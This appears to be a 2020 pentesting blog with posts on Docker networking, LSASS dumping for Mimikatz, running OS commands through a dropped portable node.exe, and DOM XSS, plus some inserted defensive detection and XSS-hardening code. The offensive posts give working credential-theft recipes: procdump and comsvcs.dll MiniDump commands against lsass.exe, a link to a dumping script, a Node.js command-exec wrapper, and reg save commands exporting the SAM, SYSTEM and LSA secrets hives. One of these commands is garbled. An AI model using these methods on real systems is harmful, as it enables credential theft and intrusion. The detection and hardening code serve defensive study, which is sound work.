Saturday, 18 April 2020

Dockers and Containers


For years, developers have struggled to set up a development environment with the right tools and configurations, and with the time it takes to do so.

This becomes even more complex when a developer uses a diverse technology stack. Consider a scenario where a developer has written code in Python to accept web requests, uses MongoDB as the back-end, and further uses an analytics application to generate reports.

Now, as you can see, a diverse technology stack comes into the picture here. Is it an easy task to set up all these stacks and connect them with each other? Not at all. That's where Docker technology comes into the picture.

With Docker, installing the required technology tools/stack becomes very handy: it takes just a few commands, and for the rest you rely on Docker to take care of the back-end dependencies.


  1. docker run --name=db -d mongo   (This will install a complete running MongoDB for you)
  2. docker run --name=mysql -d mysql   (This will install a complete running MySQL DB for you)
  3. docker run --name=web -d nginx   (This will install a complete running NGINX for you)
It's that easy! Of course, we can specify additional configuration through parameters; refer to the respective Docker image documentation for the same.



By default, when a container is started, it is allocated an IP address within the subnet range defined for the bridge network.

First we can list the Docker networks as shown below:

docker network ls

To view the details of the default IP range configured, we can use the following command:

docker network inspect bridge

Now we know the default range allocated for containers. We can list the IP address of a running container by executing the following command:

docker container inspect --format '{{ .NetworkSettings.IPAddress }}' <container name>

List the Docker containers running on the system along with their details:

docker ps
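The three commands above answer the same questions by hand; as an added example (not code from the original post), the script below parses the JSON that "docker network inspect bridge" prints and summarises the subnet, the gateway, every attached container's IP, and whether inter-container communication (icc) is enabled. That last flag is the security-relevant detail: on the default bridge every container can reach every other container's IP unless icc is disabled. The JSON here is a constructed sample in the shape Docker emits; the network id, container id and MAC address are placeholders.

```javascript
// Constructed sample of `docker network inspect bridge` output (Docker prints
// an array with one entry per network). Ids and MAC are placeholders.
const SAMPLE_INSPECT_OUTPUT = JSON.stringify([
  {
    Name: "bridge",
    Id: "0000000000000000000000000000000000000000000000000000000000000000",
    Driver: "bridge",
    IPAM: {
      Driver: "default",
      Config: [{ Subnet: "172.17.0.0/16", Gateway: "172.17.0.1" }],
    },
    Containers: {
      "1111111111111111111111111111111111111111111111111111111111111111": {
        Name: "db",
        MacAddress: "02:42:ac:11:00:02",
        IPv4Address: "172.17.0.2/16",
        IPv6Address: "",
      },
    },
    Options: {
      "com.docker.network.bridge.enable_icc": "true",
      "com.docker.network.bridge.name": "docker0",
    },
  },
]);

// Turn the raw inspect JSON into a flat summary object.
function summariseBridgeNetwork(inspectJson) {
  const [network] = JSON.parse(inspectJson);
  const ipam = (network.IPAM && network.IPAM.Config && network.IPAM.Config[0]) || {};
  const containers = Object.values(network.Containers || {}).map((c) => ({
    name: c.Name,
    // IPv4Address carries the prefix length ("172.17.0.2/16"); strip it so the
    // value matches what `docker container inspect --format
    // '{{ .NetworkSettings.IPAddress }}'` prints for the same container.
    ip: c.IPv4Address.split("/")[0],
  }));
  const options = network.Options || {};
  return {
    name: network.Name,
    subnet: ipam.Subnet,
    gateway: ipam.Gateway,
    // Docker's default is icc=true, so an absent option counts as enabled.
    interContainerTraffic: options["com.docker.network.bridge.enable_icc"] !== "false",
    containers,
  };
}

// Stand-alone run on the constructed sample.
console.log(JSON.stringify(summariseBridgeNetwork(SAMPLE_INSPECT_OUTPUT), null, 2));
```

To run it against a real host, save the command output first ("docker network inspect bridge > bridge.json") and pass the file contents to summariseBridgeNetwork instead of the constructed sample.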

Monday, 13 April 2020

LSASS Dumping Methods ( For Mimikatz )


In every attack we need to get the Windows credentials; this is a super important task. We need to target the "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods:

Using ProcDump :

1. The favorite method of dumping is using "procdump.exe". This tool is from Microsoft PsTools
2. Download procdump.exe and upload it on the remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download the script from here:
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp

rundll32 Command :

Essentially, the VBS script from the previous method uses the following command to dump the lsass.exe process:

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So even if you do not have the VB Script with you, you can still fire up the command and dump the LSASS process.

Wednesday, 1 April 2020

Executing Commands via Node.js ( Portable Node.exe )


I was exploring Node.js and thought I would publish an article here on how we can leverage Node.js in pentesting.

I saw a few articles about malware targeting some organizations in the USA and UK that uses Node.js in its attacks. It seems a really interesting idea to explore how we can leverage this in our Red Teams!

Quick Introduction on Node.js

1. It's an open-source JavaScript runtime environment
2. In simple words, it's server-side JavaScript
3. Node.js gives you access to its API, which can control the system.


Similar to other programming languages, you can create, read and modify files, access the OS, etc.

For the complete list of APIs refer to - https://nodejs.org/docs/latest-v13.x/api/


1. Install Node.js on Windows
2. After installation you can access it with the 'node' command
3. In the Node console we can execute Node commands

Now, for pen-testers, we don't have to install Node.js on the remote system; we can always carry a portable node.exe file and drop it on the remote system. (I don't have to tell you where to get node.exe; you can figure it out yourself!)


Here is the code we can use for executing OS commands via the Node.js API.

// Everything after "node.exe file.js" is treated as the command to run.
// process.argv is an array and exec() expects a single string, so the
// arguments are joined back into one command line.
var myArgs = process.argv.slice(2);
var command = myArgs.join(" ");

const { exec } = require("child_process");

exec(command, (error, stdout, stderr) => {
    if (error) {
        console.log(`error: ${error.message}`);
        return;
    }
    // A command may write to both streams; report stderr without discarding stdout.
    if (stderr) {
        console.log(`stderr: ${stderr}`);
    }
    console.log(`stdout: ${stdout}`);
});


Executing OS commands via Node.js

Now we can pass on the following important commands as well:

1. node.exe file.js "reg save HKLM\SAM c:\SAM"
2. node.exe file.js "reg save HKLM\SYSTEM c:\SYSTEM"
3. node.exe file.js "HKEY_LOCAL_MACHINE\Security\Policy\Secrets c:\lsa"


This is just one way of executing OS commands via a portable node.exe.

A lot more can be done with this, even a simple command-and-control script that calls back to your web server and fetches commands, or a web server using Node.js that we can use for accessing victim files!
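From the defender's side, both the LSASS dumping methods in the earlier post (procdump -ma against lsass, and rundll32 loading comsvcs.dll MiniDump) and the node.exe-launched "reg save" commands above leave distinctive process-creation events. As an added example, not code from the original posts, the script below runs simple detection rules over constructed process-creation records. Field names follow the Sysmon Event ID 1 style (Image, ParentImage, CommandLine) but the events, paths and PIDs are constructed for this example, and the rules deliberately key on the command line rather than the binary name, because a renamed procdump.exe defeats an image-name match and the comsvcs method names a PID, so the string "lsass" never appears in it.

```javascript
// Constructed process-creation records, serialised one JSON object per line
// the way a log shipper would deliver them.
const SAMPLE_LOG_LINES = [
  { Image: "C:\\Tools\\procdump.exe", ParentImage: "C:\\Windows\\System32\\cmd.exe",
    CommandLine: "procdump -ma lsass.exe lsass.dmp" },
  { Image: "C:\\Windows\\System32\\rundll32.exe", ParentImage: "C:\\Windows\\System32\\wscript.exe",
    CommandLine: "rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump 992 C:\\Users\\Public\\lsass.bin full" },
  { Image: "C:\\Windows\\System32\\cmd.exe", ParentImage: "C:\\Users\\Public\\node.exe",
    CommandLine: "C:\\Windows\\system32\\cmd.exe /d /s /c \"reg save HKLM\\SAM c:\\SAM\"" },
  { Image: "C:\\Windows\\System32\\notepad.exe", ParentImage: "C:\\Windows\\explorer.exe",
    CommandLine: "notepad.exe notes.txt" },
].map((event) => JSON.stringify(event));

// Script hosts that rarely spawn credential-access tooling in normal use;
// a match with one of these as the parent is worth escalating.
const SCRIPT_HOSTS = new Set(["node.exe", "wscript.exe", "cscript.exe"]);

// Lower-cased file name of a Windows or POSIX path.
const basename = (p) => (p || "").split(/[\\/]/).pop().toLowerCase();

// Each rule receives the lower-cased command line.
const RULES = [
  { id: "lsass-dump-procdump",
    test: (cmd) => /(^|\s)-ma(\s|$)/.test(cmd) && /lsass/.test(cmd) },
  { id: "lsass-dump-comsvcs-minidump",
    test: (cmd) => /comsvcs\.dll/.test(cmd) && /minidump/.test(cmd) },
  { id: "credential-hive-export",
    test: (cmd) => /\breg(\.exe)?\s+save\b/.test(cmd) &&
                   /(hklm|hkey_local_machine)\\(sam|system|security)\b/.test(cmd) },
];

// Parse each line, apply every rule, and return one finding per match.
function scanProcessEvents(lines) {
  const findings = [];
  for (const line of lines) {
    let event;
    try {
      event = JSON.parse(line);
    } catch (err) {
      continue; // skip malformed lines rather than abort the scan
    }
    const cmd = (event.CommandLine || "").toLowerCase();
    for (const rule of RULES) {
      if (rule.test(cmd)) {
        findings.push({
          rule: rule.id,
          image: basename(event.Image),
          parent: basename(event.ParentImage),
          scriptHostParent: SCRIPT_HOSTS.has(basename(event.ParentImage)),
          commandLine: event.CommandLine,
        });
      }
    }
  }
  return findings;
}

// Stand-alone run over the constructed records.
for (const f of scanProcessEvents(SAMPLE_LOG_LINES)) {
  console.log(`${f.rule}: ${f.image} (parent ${f.parent}, script host: ${f.scriptHostParent})`);
}
```

The fourth record is a benign control to confirm the rules do not fire on ordinary process starts. In practice the command-line patterns above are a starting point: the procdump rule should also be paired with the Sysmon ProcessAccess event (ID 10) for handles opened on lsass.exe, which catches dumpers that never put "lsass" on the command line.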


There have been instances of malware code containing hard-coded Node.js links for downloading node.exe:
https://nodejs.org/dist/latest-v10.x/win-x86/


Here is a good article on malware using Node.js:
https://isc.sans.edu/forums/diary/Malware+Dropping+a+Local+Nodejs+Instance/25284/


Document Object Model and DOM XSS


DOM (Document Object Model)

How many times have you seen applications in the past where, even if you click on a button or select an item from a list box, the complete page is refreshed? Basically, at each such event a request is sent to the server, and the server responds with the complete HTML code to the client browser.

Isn't this tedious? Why load a complete HTML page with thousands of tags for each request? Instead, what if there were a way to update only a specific tag within the HTML without loading the whole page?

In this case, we can give control to JavaScript executing in the client browser to change/modify/update data within specific tags in the HTML. The other tags and data in the page remain the same without any refresh. This is faster!

By manipulating the DOM,
1. You can create applications that update the data of the page without needing a refresh.
2. You can create applications that are customizable by the user and then change the layout of the page without a refresh.


Key points about the DOM:
1. A page loaded in the application contains thousands of HTML tags; consider each of these an object.
2. The browser builds a hierarchical view of the tags so that client-side JavaScript can query a specific tag, extract the tag's data, and change/modify/update the data within the tags as required by the application or user.


Example :

Consider a website that loads flight tickets: you select the source and destination and click on search, after which a request is sent to the server to retrieve the price.

Once the price is retrieved by JavaScript, it can query for the specific tag in the page where the price data needs to be updated. Using DOM methods, JavaScript can change/update/modify the data in that specific tag, and now you see the price in front of you!



For the key DOM methods refer to : https://www.w3schools.com/js/js_htmldom_document.asp


Querying the tags using DOM methods

DOM-Based XSS Attack :

Diagram of a DOM-based XSS attack
Reference : excess-xss.com


Summary :
1. The attacker crafts a URL with an XSS payload
2. Sends the link to the victim
3. The victim opens the link
4. The request is sent to the server
5. Using the DOM method document.querySelector, content from the parameter "keyword" is written into the page without appropriate validation.

Before updating the element obtained via querySelector, the string being passed should be appropriately validated and encoded for the context it is written into; a plain string check is not enough once the value reaches an HTML sink.
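As an added example (not code from the original post), the functions below show the DOM query pattern from the previous section and the "keyword" sink from the attack summary side by side with two hardened forms. In a browser the value would come from location.href and the target element from document.querySelector("#results"); the parameter name "keyword" is the one in the summary, while "#results" and the function names are hypothetical.

```javascript
// Source: the "keyword" query parameter of the page URL. searchParams.get()
// returns the decoded value, exactly what the page would splice into markup.
function keywordFromUrl(href) {
  return new URL(href).searchParams.get("keyword") || "";
}

// Vulnerable: the raw parameter is spliced into markup. Assigned to
// element.innerHTML, a value such as <script>...</script> or
// <img onerror=...> is parsed as HTML and executes in the victim's browser.
function vulnerableResultsMarkup(keyword) {
  return `<h2>Results for ${keyword}</h2>`;
}

// Hardened form 1: encode the five HTML metacharacters before the value
// reaches an HTML sink such as innerHTML.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function safeResultsMarkup(keyword) {
  return `<h2>Results for ${escapeHtml(keyword)}</h2>`;
}

// Hardened form 2: avoid the HTML sink altogether. textContent creates a text
// node, so the browser never parses the value as markup. `element` is the
// node returned by document.querySelector in a browser; any object with a
// textContent property works here.
function renderKeyword(element, keyword) {
  element.textContent = `Results for ${keyword}`;
  return element.textContent;
}

// Input validation, as the post recommends: accept only what a search keyword
// legitimately needs (letters, digits, spaces, hyphens; at most 64 chars) and
// reject the rest before use. Encoding is still required at the sink;
// validation is a second layer, not a replacement.
function isValidKeyword(keyword) {
  return /^[\p{L}\p{N} \-]{1,64}$/u.test(keyword);
}

// Stand-alone run on a constructed URL carrying a harmless marker payload.
const demoHref = "https://example.test/search?keyword=%3Cb%3Eflights%3C%2Fb%3E";
const demoKeyword = keywordFromUrl(demoHref);
console.log("vulnerable:", vulnerableResultsMarkup(demoKeyword));
console.log("encoded:   ", safeResultsMarkup(demoKeyword));
console.log("text node: ", renderKeyword({ textContent: "" }, demoKeyword));
console.log("valid?     ", isValidKeyword(demoKeyword));
```

The vulnerable function is the shape of the bug in the hackerone reports referenced below: the parameter is trusted because it "came from our own URL", even though the attacker chose it. Prefer the textContent form wherever the value is only ever text; reserve escapeHtml for the rare case where markup really has to be built from strings.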


References :

https://hackerone.com/reports/324303

https://hackerone.com/reports/398054

https://www.freecodecamp.org/news/whats-the-document-object-model-and-why-you-should-know-how-to-use-it-1a2d0bc5429d/

https://www.researchgate.net/figure/DOM-XSS-attack-exploitation_fig4_317560469

https://excess-xss.com/

https://www.w3schools.com/js/js_htmldom_document.asp